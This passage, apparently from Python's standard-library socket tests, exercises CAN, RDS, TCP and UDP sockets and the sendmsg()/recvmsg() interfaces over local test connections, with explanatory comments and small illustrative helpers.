with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
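# Note: can_frame_fmt is provided by the SocketCANTest base class; it is
# assumed to mirror struct can_frame from <linux/can.h>, i.e. a 32-bit CAN
# id, an 8-bit data length code, padding, and 8 data bytes.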
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
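# As an illustrative sketch of how these pieces combine (the concrete classes
# are defined further below), a UDP recvmsg() test case would look roughly
# like:
#
#     class SendrecvmsgUDPTestBase(SendrecvmsgConnectionlessBase,
#                                  ThreadedSocketTestMixin, UDPTestBase):
#         pass
#
#     class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
#         pass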
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
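# For instance (illustrative call), a stream test that tolerates truncated
# control data could check for end-of-record while ignoring MSG_CTRUNC:
#     self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)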
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
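# Illustrative sketch, not part of the test suite: a non-blocking send
# using sendmsg() with MSG_DONTWAIT, the behaviour exercised by
# SendmsgStreamTests.testSendmsgDontWait above.  The helper name is
# hypothetical; MSG_DONTWAIT is only known to work for sending on Linux.
def _example_sendmsg_dontwait(sock, payload):
    import errno
    import socket
    try:
        return sock.sendmsg([payload], [], socket.MSG_DONTWAIT)
    except OSError as e:
        if e.errno in (errno.EAGAIN, errno.EWOULDBLOCK):
            return 0  # send buffer full; caller should retry later
        raise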
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
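# Illustrative sketch, not part of the test suite: on an unconnected
# datagram socket, sendmsg() needs an explicit destination address as its
# fourth argument, which is what SendmsgConnectionlessTests checks above.
# The helper name and the destination address are hypothetical.
def _example_sendmsg_unconnected(payload, addr=("127.0.0.1", 9999)):
    import socket
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        # buffers, ancillary data, flags, destination address
        return s.sendmsg([payload], [], 0, addr)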
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
